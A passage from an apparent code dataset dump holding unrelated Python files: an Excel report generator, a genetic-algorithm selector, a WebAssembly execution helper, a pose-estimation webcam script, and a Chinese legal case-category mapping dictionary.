utf-8 -*-\n\nimport os\nfrom collections import defaultdict\nfrom string import ascii_uppercase\n\nimport xlsxwriter\nfrom customer import get_customers\nfrom kuorimo.misc.database import Database\nfrom product import get_products\n\n\ndef get_report(d, customer_number, year, month):\n cursor = d.get_cursor()\n query = \"\"\" SELECT orders.date AS order_date,\n product.name AS product_name,\n product.number AS product_number, SUM(orders.amount) AS total\n FROM orders \n JOIN product ON orders.prod_number=product.number\n WHERE orders.cust_number=? AND strftime('%Y%m', orders.date)=?\n GROUP BY orders.prod_number, orders.date\n ORDER by orders.date, product.name\"\"\"\n\n results = defaultdict(list)\n period = year + str(month).zfill(2)\n db_result = cursor.execute(query, (customer_number, period))\n for item in db_result:\n results[item['order_date']].append((item['product_number'], item['total']))\n cursor.close()\n return results\n\n\nclass XlsReportGenerator(object):\n \"\"\"Generate xls report, each customer in its own worksheet\"\"\"\n\n def __init__(self, year, month, path_to_report):\n self.month = month\n self.year = str(year)\n self.db = Database()\n self.workbook = xlsxwriter.Workbook(path_to_report)\n # Add formats to use to highlight cells.\n self.bold = self.workbook.add_format({'bold': True})\n self.bold_red = self.workbook.add_format({'bold': True, 'font_color': 'red'})\n self.bold_sized = self.workbook.add_format({'bold': True, 'font_size': 14})\n self.bold_bg_gray = self.workbook.add_format({'bold': True, 'font_color': 'white', 'bg_color': 'gray'})\n self.bold_bg_gray_sized = self.workbook.add_format({'bold': True,\n 'font_color': 'white',\n 'font_size': 13,\n 'bg_color': 'gray'})\n\n # Create a format to use in the merged range.\n self.merge_format = self.workbook.add_format({'bold': True, 'font_size': 14, 'align': 'center'})\n\n self.worksheets = {}\n self.customers = {}\n self.products = {}\n\n def generate_workbook(self):\n for customer in get_customers(self.db):\n customer_name = customer['name']\n customer_number = customer['number']\n self.customers[customer_number] = customer_name\n worksheet = self.workbook.add_worksheet(customer_name)\n worksheet.set_column('A:A', 14)\n worksheet.write('A3', 'Date', self.bold_bg_gray)\n for product, cell_letter in zip(get_products(self.db), ascii_uppercase[1:]):\n worksheet.set_column('%s:%s' % (cell_letter, cell_letter), 13)\n worksheet.write(cell_letter + '3', product['name'], self.bold_bg_gray)\n self.products[product['number']] = cell_letter\n\n self.worksheets[customer['number']] = worksheet\n\n def generate_worksheet(self, customer_number, customer_name):\n reports = get_report(self.db, customer_number, self.year, self.month)\n dates = sorted(reports.keys())\n\n # print the name of the customer to be able to generate PDF file\n customer_text = \"{}/{}\".format(customer_number, customer_name.upper())\n self.worksheets[customer_number].merge_range('A1:C1', customer_text, self.merge_format)\n\n cell_number = 4\n for date in dates:\n date_cell = 'A' + str(cell_number)\n self.worksheets[customer_number].write(date_cell, date)\n rows = reports[date]\n for product_number, total in rows:\n product_cell = self.products[product_number] + str(cell_number)\n self.worksheets[customer_number].write(product_cell, total)\n self.worksheets[customer_number].write(product_cell, total)\n cell_number += 1\n\n if reports:\n self.worksheets[customer_number].write('A' + str(cell_number + 2), 'Total', self.bold_bg_gray_sized)\n for cell_letter in ascii_uppercase[1: len(self.products) + 1]:\n self.worksheets[customer_number].write(cell_letter + str(cell_number + 2),\n '=SUM(%s:%s)' % (cell_letter + '2',\n cell_letter + str(cell_number - 1)),\n self.bold_bg_gray_sized)\n\n def generate_report(self):\n self.generate_workbook()\n for customer_number, customer_name in self.customers.items():\n self.generate_worksheet(customer_number, customer_name)\n self.workbook.close()\n\n\ndef generate_report(year, month, path):\n g = XlsReportGenerator(year, month, path)\n g.generate_report()\n return os.path.exists(path)\n\nif __name__ == '__main__':\n\n path = '/Users/skocle/Desktop/demo.xlsx'\n generate_report(2017, 9, path)","sub_path":"src/kuorimo/api/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"262627193","text":"#!/bin/python3\n\nfrom geneticSelectors.selector import Selector\n\nimport random as rd\n\nclass Tournaments1Selector(Selector):\n def __init__(self, N):\n super().__init__(N)\n \n def select(self, group, K):\n selected = []\n for touranment in range(K):\n x, y = rd.sample(group, 2)\n winner = max(x, y)\n selected.append(winner)\n return selected\n\n","sub_path":"TP2/geneticSelectors/tournaments1Selector.py","file_name":"tournaments1Selector.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"255938419","text":"import logging\nfrom ._instantiate import instantiate\nfrom . import wasi\n\n\nlogger = logging.getLogger(\"wasm-execute\")\n\n\ndef execute_wasm(module, args, target=\"python\", function=None, reporter=None):\n \"\"\" Execute the given wasm module. \"\"\"\n wasi_api = wasi.WasiApi()\n imports = {\n \"wasi_unstable\": {\n \"fd_prestat_get\": wasi_api.fd_prestat_get,\n \"fd_prestat_dir_name\": wasi_api.fd_prestat_dir_name,\n \"clock_time_get\": wasi_api.clock_time_get,\n \"proc_exit\": wasi_api.proc_exit,\n \"fd_fdstat_get\": wasi_api.fd_fdstat_get,\n \"fd_close\": wasi_api.fd_close,\n \"args_sizes_get\": wasi_api.args_sizes_get,\n \"args_get\": wasi_api.args_get,\n \"fd_seek\": wasi_api.fd_seek,\n \"fd_write\": wasi_api.fd_write,\n \"environ_sizes_get\": wasi_api.environ_sizes_get,\n \"environ_get\": wasi_api.environ_get,\n }\n }\n instance = instantiate(module, imports, target=target, reporter=reporter)\n\n logger.info(\"Created instance %s\", instance)\n\n # Hack hack hack, give wasi api access to the instance:\n # This is handy for memory access.\n wasi_api._instance = instance\n\n if function:\n # Run a specific function in the wasm module\n result = instance.exports[function](*args)\n print(\"Result:\", result)\n else:\n # Assume WASI\n instance.exports[\"_start\"]()\n","sub_path":"ppci/wasm/execution/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"103556109","text":"\n# coding: utf-8\n\n# In[1]:\nimport time\n\n\nimport os\nimport sys\nimport numpy as np\nimport cv2\n#sys.path.append(os.path.dirname(__file__) + \"/../\")\nfrom scipy.misc import imread, imsave\nfrom skimage.measure import structural_similarity as ssim\nfrom config import load_config\nfrom dataset.factory import create as create_dataset\nfrom nnet import predict\nfrom util import visualize\nimport cv2\nfrom dataset.pose_dataset import data_to_input\n\n\nfrom multiperson.detections import extract_detections\nfrom multiperson.predict import SpatialModel, eval_graph, get_person_conf_multicut\nfrom multiperson.visualize import PersonDraw, visualize_detections\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n\n# In[10]:\n\n\ndef mse(imageA,imageB):\n err = np.sum((imageA.astype(\"float\")-imageB.astype(\"float\"))**2)\n err /= float(imageA.shape[0]*imageA.shape[1])\n return err\n\ndef compare_images(imageA, imageB, title):\n m = mse(imageA, imageB)\n s = ssim(imageA, imageB)\n fig = plt.figure(title)\n plt.suptitle(\"MSE: %.2f, SSIM: %.2f\" % (m, s))\n\n ax = fig.add_subplot(1, 2, 1)\n plt.imshow(imageA, cmap = plt.cm.gray)\n plt.axis(\"off\")\n ax = fig.add_subplot(1, 2, 2)\n \n plt.imshow(imageB, cmap = plt.cm.gray)\n plt.axis(\"off\")\n plt.show()\n \n return(s,m)\n\n\n# In[6]:\n\ndef main():\n start_time=time.time()\n print(\"main hai\")\n tf.reset_default_graph()\n cfg = load_config(\"demo/pose_cfg_multi.yaml\")\n dataset = create_dataset(cfg)\n sm = SpatialModel(cfg)\n sm.load()\n draw_multi = PersonDraw()\n # Load and setup CNN part detector\n sess, inputs, outputs = predict.setup_pose_prediction(cfg)\n\n # Read image from file\n dir=os.listdir(\"stick\")\n k=0\n cap=cv2.VideoCapture(0)\n i=0\n while (cap.isOpened()):\n if i%20 == 0: \n ret, orig_frame= cap.read()\n if ret==True:\n frame = cv2.resize(orig_frame, (0, 0), fx=0.30, fy=0.30)\n image= frame\n sse=0\n mse=0\n \n image_batch = data_to_input(frame)\n\n # Compute prediction with the CNN\n outputs_np = sess.run(outputs, feed_dict={inputs: image_batch})\n\n scmap, locref, pairwise_diff = predict.extract_cnn_output(outputs_np, cfg, dataset.pairwise_stats)\n\n detections = extract_detections(cfg, scmap, locref, pairwise_diff)\n\n unLab, pos_array, unary_array, pwidx_array, pw_array = eval_graph(sm, detections)\n\n person_conf_multi = get_person_conf_multicut(sm, unLab, unary_array, pos_array)\n img = np.copy(image)\n #coor = PersonDraw.draw()\n visim_multi = img.copy()\n co1=draw_multi.draw(visim_multi, dataset, person_conf_multi)\n plt.imshow(visim_multi)\n plt.show()\n visualize.waitforbuttonpress()\n #print(\"this is draw : \", co1)\n if k==1:\n qwr = np.zeros((1920,1080,3), np.uint8)\n\n cv2.line(qwr, co1[5][0], co1[5][1],(255,0,0),3)\n cv2.line(qwr, co1[7][0], co1[7][1],(255,0,0),3)\n cv2.line(qwr, co1[6][0], co1[6][1],(255,0,0),3)\n cv2.line(qwr, co1[4][0], co1[4][1],(255,0,0),3)\n\n cv2.line(qwr, co1[9][0], co1[9][1],(255,0,0),3)\n cv2.line(qwr, co1[11][0], co1[11][1],(255,0,0),3)\n cv2.line(qwr, co1[8][0], co1[8][1],(255,0,0),3)\n cv2.line(qwr, co1[10][0], co1[10][1],(255,0,0),3)\n # In[9]:\n cv2.imshow('r',qwr)\n qwr2=\"stick/frame\"+str(k)+\".jpg\"\n qw1 = cv2.cvtColor(qwr, cv2.COLOR_BGR2GRAY)\n qw2= cv2.cvtColor(qwr2, cv2.COLOR_BGR2GRAY)\n\n fig = plt.figure(\"Images\")\n images = (\"Original\", qw1), (\"Contrast\", qw2)\n for (i, (name, image)) in enumerate(images):\n ax = fig.add_subplot(1, 3, i + 1)\n ax.set_title(name)\n plt.imshow(hash(tuple(image)))\n # compare the images\n s,m=compare_images(qw1, qw2, \"Image1 vs Image2\")\n k+=1\n sse=s\n mse=m\n\n else:\n break\n elapsed= time.time()-start_time\n #print(\"sse score : \", sse)\n print(\"Mean squared error : \", elapsed/100)\n cap.release()\n cv2.destroyAllWindows()\n\nif __name__=='__main__':\n main()","sub_path":"finalmost.py","file_name":"finalmost.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"562176770","text":"# -*- coding: utf-8 -*-\r\nfrom src.head import *\r\ncase_map_dict = {\r\n u'侵害作品翻译权纠纷': u'知识产权权属侵权纠纷',\r\n u'侵占罪': u'侵犯财产罪',\r\n u'多式联运合同纠纷': u'合同纠纷',\r\n u'名誉权纠纷': u'人格权纠纷',\r\n u'代为继承': u'继承纠纷',\r\n u'公示催告': u'公示催告程序案件',\r\n u'资敌罪': u'危害国家安全罪',\r\n u'战时残害居民、掠夺居民财物罪': u'军人违反职责罪',\r\n u'滥用管理公司、证券职权罪': u'渎职罪',\r\n u'破坏军婚罪': u'侵犯公民人身权利、民主权利罪',\r\n u'盗掘古人类化石、古脊椎动物化石罪': u'妨害社会管理秩序罪',\r\n u'颁发': u'行政管理与行政行为',\r\n u'表演合同纠纷': u'知识产权合同纠纷',\r\n u'股权转让纠纷': u'与公司有关的纠纷',\r\n u'取回权': u'信用证纠纷',\r\n u'战时拒绝、逃避征召、军事训练罪': u'危害国防利益罪',\r\n u'生命权健康权身体权纠纷': u'人格权纠纷',\r\n u'侵害企业名称(商号)权纠纷': u'知识产权权属侵权纠纷',\r\n u'违反': u'行政管理与行政行为',\r\n u'离婚纠纷': u'婚姻家庭纠纷',\r\n u'强迫劳动罪': u'侵犯公民人身权利、民主权利罪',\r\n u'噪声污染责任纠纷': u'侵权责任纠纷',\r\n u'企业出资人权益确认纠纷': u'与企业有关的纠纷',\r\n u'广播组织': u'知识产权权属侵权纠纷',\r\n u'保证责任': u'合同纠纷',\r\n u'信用卡': u'合同纠纷',\r\n u'分期付款': u'合同纠纷',\r\n u'银行结算合同纠纷': u'合同纠纷',\r\n u'医疗合同': u'合同纠纷',\r\n u'仿冒纠纷': u'不正当竞争纠纷',\r\n u'施工': u'合同纠纷',\r\n u'放映权': u'知识产权权属侵权纠纷',\r\n u'煽动分裂国家罪': u'危害国家安全罪',\r\n u'追收非正常收入纠纷': u'与���产有关的纠纷',\r\n u'集资诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'失业': u'劳动争议',\r\n u'操纵期货': u'期货交易纠纷',\r\n u'出版歧视、侮辱少数民族作品罪': u'侵犯公民人身权利、民主权利罪',\r\n u'商业贿赂': u'不正当竞争纠纷',\r\n u'林业承包合同纠纷': u'合同纠纷',\r\n u'阻碍执行军事职务罪': u'军人违反职责罪',\r\n u'公司合并': u'与公司有关的纠纷',\r\n u'非法行医罪': u'妨害社会管理秩序罪',\r\n u'储蓄存款': u'合同纠纷',\r\n u'技术中介合同纠纷': u'知识产权合同纠纷',\r\n u'证券投资基金': u'信用证纠纷',\r\n u'项下款项': u'申请保全案件',\r\n u'捕捞权': u'用益物权纠纷',\r\n u'船员劳务合同纠纷': u'海事海商纠纷',\r\n u'著作权许可': u'知识产权合同纠纷',\r\n u'群众性活动组织者责任纠纷': u'侵权责任纠纷',\r\n u'走私普通货物、物品罪': u'破坏社会主义市场经济秩序罪',\r\n u'荣誉权': u'人格权纠纷',\r\n u'有线电视服务合同纠纷': u'合同纠纷',\r\n u'探望权纠纷': u'婚姻家庭纠纷',\r\n u'质押式证券回购纠纷': u'证券纠纷',\r\n u'生产、销售有毒、有害食品罪': u'破坏社会主义市场经济秩序罪',\r\n u'证券发行纠纷': u'证券纠纷',\r\n u'海事债权登记与受偿': u'海事诉讼特别程序案件',\r\n u'武器装备肇事罪': u'军人违反职责罪',\r\n u'公证损害': u'侵权责任纠纷',\r\n u'监护权纠纷': u'婚姻家庭纠纷',\r\n u'间谍罪': u'危害国家安全罪',\r\n u'民事、行政枉法裁判罪': u'渎职罪',\r\n u'侵害表演者权纠纷': u'知识产权权属侵权纠纷',\r\n u'探矿权转让': u'合同纠纷',\r\n u'决定': u'行政管理与行政行为',\r\n u'放火罪': u'危害公共安全罪',\r\n u'仲裁': u'仲裁程序案件',\r\n u'车辆建造': u'合同纠纷',\r\n u'盗窃、抢夺武装部队公文、证件、印章罪': u'危害国防利益罪',\r\n u'借款合同纠纷': u'合同纠纷',\r\n u'申请确认仲裁协议效力': u'仲裁程序案件',\r\n u'公司债券权利确认纠纷': u'证券纠纷',\r\n u'非法生产、买卖警用装备罪': u'妨害社会管理秩序罪',\r\n u'建筑物、构筑物倒塌损害责任纠纷': u'侵权责任纠纷',\r\n u'播放': u'知识产权权属侵权纠纷',\r\n u'生产、销售不符合安全标准的食品罪': u'破坏社会主义市场经济秩序罪',\r\n u'捆绑销售不正当竞争纠纷': u'不正当竞争纠纷',\r\n u'肖像权纠纷': u'人格权纠纷',\r\n u'过失投放危险物质罪': u'危害公共安全罪',\r\n u'非法制造、销售非法制造的注册商标标识罪': u'破坏社会主义市场经济秩序罪',\r\n u'技术成果完成人署名权荣誉权奖励权纠纷': u'知识产权合同纠纷',\r\n u'保证合同': u'合同纠纷',\r\n u'职务技术成果': u'知识产权合同纠纷',\r\n u'非法生产、买卖武装部队制式服装罪': u'危害国防利益罪',\r\n u'窝藏、转移、隐瞒毒品、毒赃罪': u'妨害社会管理秩序罪',\r\n u'为境外窃取、剌探、收买、非法提供国家秘密、情报罪': u'危害国家安全罪',\r\n u'追收未缴出资纠纷': u'与破产有关的纠纷',\r\n u'别除权': u'信用证纠纷',\r\n u'音像制品制作': u'知识产权合同纠纷',\r\n u'诽谤罪': u'侵犯公民人身权利、民主权利罪',\r\n u'雇用逃离部队军人罪': u'危害国防利益罪',\r\n u'经济适用房转让合同纠纷': u'合同纠纷',\r\n u'出版合同': u'知识产权合同纠纷',\r\n u'过失决水罪': u'危害公共安全罪',\r\n u'买卖合同纠纷': u'合同纠纷',\r\n u'侵害作品出租权纠纷': u'知识产权权属侵权纠纷',\r\n u'工伤保险待遇纠纷': u'劳动争议',\r\n u'植物新品种合同纠纷': u'知识产权合同纠纷',\r\n u'解除收养关系纠纷': u'婚姻家庭纠纷',\r\n u'委托合同': u'合同纠纷',\r\n u'检验': u'合同纠纷',\r\n u'非法占有高度危险物损害责任纠纷': u'侵权责任纠纷',\r\n u'企业商号': u'知识产权权属侵权纠纷',\r\n u'储蓄存款合同纠纷': u'合同纠纷',\r\n u'人民调解代理': u'合同纠纷',\r\n u'非法侵入住宅罪': u'侵犯公民人身权利、民主权利罪',\r\n u'申请认可和执行香港特别行政区法院民事判决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'网络服务合同纠纷': u'合同纠纷',\r\n u'聘用合同争议': u'人事争议',\r\n u'打击报复会计、统计人员罪': u'侵犯公民人身权利、民主权利罪',\r\n u'申请拍卖扣押船用燃油及船用物料': u'海事诉讼特别程序案件',\r\n u'劳动报酬': u'劳动争议',\r\n u'倒卖文物罪': u'妨害社会管理秩序罪',\r\n u'伪造': u'不正当竞争���纷',\r\n u'民用航空运输': u'合同纠纷',\r\n u'挂靠': u'与企业有关的纠纷',\r\n u'暴力取证罪': u'侵犯公民人身权利、民主权利罪',\r\n u'土地承包经营权互换合同纠纷': u'合同纠纷',\r\n u'装潢': u'合同纠纷',\r\n u'有奖销售': u'不正当竞争纠纷',\r\n u'技术出口': u'知识产权合同纠纷',\r\n u'票据利益返还请求权纠纷': u'票据纠纷',\r\n u'复制合同纠纷': u'合同纠纷',\r\n u'金融凭证诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'假冒': u'知识产权权属侵权纠纷',\r\n u'传染病防治失职罪': u'渎职罪',\r\n u'撤销仲裁': u'仲裁程序案件',\r\n u'损害债务人利益赔偿纠纷': u'与破产有关的纠纷',\r\n u'商业秘密合同纠纷': u'知识产权合同纠纷',\r\n u'期货虚假': u'期货交易纠纷',\r\n u'融资融券': u'信用证纠纷',\r\n u'土地承包经营权纠纷': u'用益物权纠纷',\r\n u'包庇毒品犯罪分子罪': u'妨害社会管理秩序罪',\r\n u'损害股东利益责任纠纷': u'与公司有关的纠纷',\r\n u'非法拘禁罪': u'侵犯公民人身权利、民主权利罪',\r\n u'海事支付令': u'海事诉讼特别程序案件',\r\n u'养殖权纠纷': u'用益物权纠纷',\r\n u'相邻通风纠纷': u'所有权纠纷',\r\n u'冒用': u'不正当竞争纠纷',\r\n u'非法留置船舶船载货物船用燃油船用物料损害责任纠纷': u'海事海商纠纷',\r\n u'滥伐林木罪': u'妨害社会管理秩序罪',\r\n u'国债交易纠纷': u'证券纠纷',\r\n u'航空运输人身损害责任纠纷': u'侵权责任纠纷',\r\n u'公司决议纠纷': u'与公司有关的纠纷',\r\n u'申请海事证据保全': u'海事诉讼特别程序案件',\r\n u'股东损害公司债权人利益责任纠纷': u'与公司有关的纠纷',\r\n u'非法持有宣扬恐怖主义、极端主义物品罪': u'危害公共安全罪',\r\n u'教育机构': u'侵权责任纠纷',\r\n u'债权债务概括转移合同纠纷': u'合同纠纷',\r\n u'宅基地使用权纠纷': u'用益物权纠纷',\r\n u'试用买卖合同纠纷': u'合同纠纷',\r\n u'无线网址': u'知识产权权属侵权纠纷',\r\n u'垄断定价纠纷': u'垄断纠纷',\r\n u'失踪人': u'宣告失踪、宣告死亡案件',\r\n u'期货保证合约纠纷': u'期货交易纠纷',\r\n u'保荐': u'证券纠纷',\r\n u'港口货物': u'海事海商纠纷',\r\n u'公路': u'合同纠纷',\r\n u'农业承包': u'合同纠纷',\r\n u'计算机': u'知识产权权属侵权纠纷',\r\n u'虚开增值税专用发票、用于骗取出口退税、抵扣税款发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'供用电合同纠纷': u'合同纠纷',\r\n u'防卫过当损害责任纠纷': u'侵权责任纠纷',\r\n u'商标合同纠纷': u'知识产权合同纠纷',\r\n u'委托理财': u'合同纠纷',\r\n u'申请诉前停止侵害注册商标专用权': u'申请诉前停止侵害知识产权案件',\r\n u'发明专利': u'知识产权权属侵权纠纷',\r\n u'强奸罪': u'侵犯公民人身权利、民主权利罪',\r\n u'限定交易纠纷': u'垄断纠纷',\r\n u'欠款': u'合同纠纷',\r\n u'过失泄露国家秘密罪': u'渎职罪',\r\n u'缔约': u'合同纠纷',\r\n u'证券托管纠纷': u'证券纠纷',\r\n u'海运欺诈纠纷': u'海事海商纠纷',\r\n u'侵害集体经济组织': u'所有权纠纷',\r\n u'放射性污染责任纠纷': u'侵权责任纠纷',\r\n u'采矿权转让': u'合同纠纷',\r\n u'走私假币罪': u'破坏社会主义市场经济秩序罪',\r\n u'缔约过失责任纠纷': u'合同纠纷',\r\n u'包庇、纵容黑社会性质组织罪': u'妨害社会管理秩序罪',\r\n u'危险物品肇事罪': u'危害公共安全罪',\r\n u'土地租赁合同纠纷': u'合同纠纷',\r\n u'帮助毁灭、伪造证据罪': u'妨害社会管理秩序罪',\r\n u'失火罪': u'危害公共安全罪',\r\n u'侵害广播组织权纠纷': u'知识产权权属侵权纠纷',\r\n u'工程重大安全事故罪': u'危害公共安全罪',\r\n u'引诱、教唆、欺骗他人吸毒罪': u'妨害社会管理秩序罪',\r\n u'强令违章冒险作业罪': u'危害公共安全罪',\r\n u'申请执行': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'拒绝提供间谍犯罪、恐怖主义犯罪、极端主义犯罪证据罪': u'妨害社会管理秩序罪',\r\n u'帮助信息网络犯罪活动罪': u'妨害社会管理秩序罪',\r\n u'动产浮动抵押权纠纷': u'担保物权纠纷',\r\n u'申请诉中证据保全': u'申请保全案件',\r\n u'破坏永久性测量标志罪': u'妨害社会管理秩序罪',\r\n u'违规制造、销售枪支罪': u'危害公共安全罪',\r\n u'相邻污染侵害纠纷': u'所有权纠纷',\r\n u'补偿贸易': u'合同纠纷',\r\n u'资信评级': u'证券纠纷',\r\n u'饲养动物损害责任纠纷': u'侵权责任纠纷',\r\n u'返还原物': u'物权保护纠纷',\r\n u'诱骗投资者买卖证券、期货合约罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司解散': u'与公司有关的纠纷',\r\n u'防卫过当': u'侵权责任纠纷',\r\n u'申请执行知识产权仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'上市': u'信用证纠纷',\r\n u'船舶代理合同纠纷': u'海事海商纠纷',\r\n u'证券欺诈': u'证券纠纷',\r\n u'旅店服务': u'合同纠纷',\r\n u'宣扬恐怖主义、极端主义、煽动实施恐怖活动罪': u'危害公共安全罪',\r\n u'侵犯集体经济组织': u'所有权纠纷',\r\n u'妨害传染病防治罪': u'妨害社会管理秩序罪',\r\n u'海上通海水域污染损害责任纠纷': u'海事海商纠纷',\r\n u'商品房': u'合同纠纷',\r\n u'信用证开证纠纷': u'信用证纠纷',\r\n u'房地产咨询合同纠纷': u'合同纠纷',\r\n u'投放危险物质罪': u'危害公共安全罪',\r\n u'转继承': u'继承纠纷',\r\n u'民间借贷纠纷': u'合同纠纷',\r\n u'非法处置进口的固体废物罪': u'妨害社会管理秩序罪',\r\n u'邻接权': u'知识产权权属侵权纠纷',\r\n u'土地承包经营权转包合同纠纷': u'合同纠纷',\r\n u'典当': u'合同纠纷',\r\n u'企业名称(商号)使用合同纠纷': u'知识产权合同纠纷',\r\n u'离婚后损害责任纠纷': u'婚姻家庭纠纷',\r\n u'确认合同效力纠纷': u'合同纠纷',\r\n u'公益事业捐赠': u'合同纠纷',\r\n u'战时故意提供虚假敌情罪': u'危害国防利益罪',\r\n u'招标投标': u'合同纠纷',\r\n u'技术咨询': u'知识产权合同纠纷',\r\n u'航道港口疏浚合同纠纷': u'海事海商纠纷',\r\n u'容留他人吸毒罪': u'妨害社会管理秩序罪',\r\n u'出版者权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'背信运用受托财产罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法持有国家绝密、机密文件、资料、物品罪': u'妨害社会管理秩序罪',\r\n u'国有公司、企业、事业单位人员失职罪': u'破坏社会主义市场经济秩序罪',\r\n u'外观设计': u'知识产权权属侵权纠纷',\r\n u'丢失枪支不报罪': u'危害公共安全罪',\r\n u'海运集装箱': u'海事海商纠纷',\r\n u'民用核设施损害责任纠纷': u'侵权责任纠纷',\r\n u'商标代理合同纠纷': u'知识产权合同纠纷',\r\n u'过失泄露军事秘密罪': u'军人违反职责罪',\r\n u'出具证明文件重大失实罪': u'破坏社会主义市场经济秩序罪',\r\n u'高利转贷罪': u'破坏社会主义市场经济秩序罪',\r\n u'贷款诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'专利权转让合同纠纷': u'知识产权合同纠纷',\r\n u'航空旅客运输合同纠纷': u'合同纠纷',\r\n u'动产抵押权纠纷': u'担保物权纠纷',\r\n u'过失提供不合格武器装备、军事设施罪': u'危害国防利益罪',\r\n u'修理': u'物权保护纠纷',\r\n u'兼并': u'与企业有关的纠纷',\r\n u'建筑物区分': u'物权保护纠纷',\r\n u'失踪人债务支付纠纷': u'宣告失踪、宣告死亡案件',\r\n u'证券内幕交易责任纠纷': u'证券纠纷',\r\n u'背叛国家罪': u'危害国家安全罪',\r\n u'建设工程施工合同纠纷': u'合同纠纷',\r\n u'破坏生产经营罪': u'侵犯财产罪',\r\n u'定价': u'垄断纠纷',\r\n u'非法狩猎罪': u'妨害社会管理秩序罪',\r\n u'非法生产、买卖、运输制毒物品、走私制毒物品罪': u'妨害社会管理秩序罪',\r\n u'经营秘密许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'公司清算': u'与公司有关的纠纷',\r\n u'占有物损害赔偿纠纷': u'占有保护纠纷',\r\n u'航空运输损害责任纠纷': u'侵权责任纠纷',\r\n u'因申请诉前停止侵害专利权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'地役权': u'用益物权纠纷',\r\n u'操纵证券交易市场责任纠纷': u'证券纠纷',\r\n u'土地承包经营权转让合同纠纷': u'合同纠纷',\r\n u'地面施工、地下设施损害责任纠纷': u'侵权责任纠纷',\r\n u'盗掘古文化遗址、古墓葬罪': u'妨害社会管理秩序罪',\r\n u'承包': u'合同纠纷',\r\n u'关联交易': u'信用证纠纷',\r\n u'水域': u'海事海商纠纷',\r\n u'非法占用农用地罪': u'妨害社会管理秩序罪',\r\n u'管理人责任': u'与破产有关的纠纷',\r\n u'海洋开发': u'海事海商纠纷',\r\n u'执行分配方案异议之诉': u'执行异议之诉',\r\n u'非法制造、出售非法制造的发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'单位行贿罪': u'贪污贿赂罪',\r\n u'股份合作制': u'与企业有关的纠纷',\r\n u'许可': u'行政管理与行政行为',\r\n u'知识产权': u'知识产权权属侵权纠纷',\r\n u'低价倾销不正当竞争纠纷': u'不正当竞争纠纷',\r\n u'建筑物和其他土地附着物抵押权纠纷': u'担保物权纠纷',\r\n u'暴力危及飞行安全罪': u'危害公共安全罪',\r\n u'业主知情权纠纷': u'所有权纠纷',\r\n u'串通投标': u'不正当竞争纠纷',\r\n u'付款请求': u'信用证纠纷',\r\n u'进出口': u'合同纠纷',\r\n u'赌博罪': u'妨害社会管理秩序罪',\r\n u'伪造、变造金融票证罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请宣告公民': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'船舶污染': u'海事海商纠纷',\r\n u'伪造、盗窃、买卖、非法提供、非法使用武装部队专用标志罪': u'危害国防利益罪',\r\n u'植物新品种权转让合同纠纷': u'知识产权合同纠纷',\r\n u'以物抵债协议': u'合同纠纷',\r\n u'因申请海关知识产权保护措施损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'虚假宣传纠纷': u'不正当竞争纠纷',\r\n u'海上通海水域人身损害责任纠纷': u'海事海商纠纷',\r\n u'运送他人偷越国(边)境罪': u'妨害社会管理秩序罪',\r\n u'供用气合同纠纷': u'合同纠纷',\r\n u'经济补偿': u'劳动争议',\r\n u'业主专有权纠纷': u'所有权纠纷',\r\n u'出版合同纠纷': u'知识产权合同纠纷',\r\n u'安置补偿': u'合同纠纷',\r\n u'法律服务合同纠纷': u'合同纠纷',\r\n u'不当得利': u'不当得利纠纷',\r\n u'海洋': u'海事海商纠纷',\r\n u'附义务赠与合同纠纷': u'合同纠纷',\r\n u'伪造、变造、买卖身份证件罪': u'妨害社会管理秩序罪',\r\n u'种子产品质量': u'侵权责任纠纷',\r\n u'隐私权': u'人格权纠纷',\r\n u'破坏易燃易爆设备罪': u'危害公共安全罪',\r\n u'因申请诉前财产保全损害责任纠纷': u'侵权责任纠纷',\r\n u'建设工程价款优先受偿权纠纷': u'合同纠纷',\r\n u'行纪合同': u'合同纠纷',\r\n u'以危险方法危害公共安全罪': u'危害公共安全罪',\r\n u'企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'新增资本认购纠纷': u'与公司有关的纠纷',\r\n u'保险代位': u'保险纠纷',\r\n u'故意延误投递邮件罪': u'妨害社会管理秩序罪',\r\n u'申请确定监护人': u'监护权特别程序案件',\r\n u'房屋拆迁安置补偿合同纠纷': u'合同纠纷',\r\n u'仲裁程序中的财产保全': u'申请保全案件',\r\n u'医疗保险待遇纠纷': u'劳动争议',\r\n u'集成电路布图设计创作合同纠纷': u'知识产权合同纠纷',\r\n u'金融不良债权': u'合同纠纷',\r\n u'使用权纠纷': u'所有权纠纷',\r\n u'房屋租赁': u'合同纠纷',\r\n u'水上运输损害责任纠纷': u'侵权责任纠纷',\r\n u'相邻关系纠纷': u'所有权纠纷',\r\n u'战时临阵脱逃罪': u'军人违反职责罪',\r\n u'非法生产、销售专用间谍器材、窃听、窃照专用器材罪': u'妨害社会管理秩序罪',\r\n u'遗赠扶养协议纠纷': u'继承纠纷',\r\n u'拒传、假传军令罪': u'军人违反职责罪',\r\n u'公共道路妨碍通行损害责任纠纷': u'侵权责任纠纷',\r\n u'倒卖车票、船票罪': 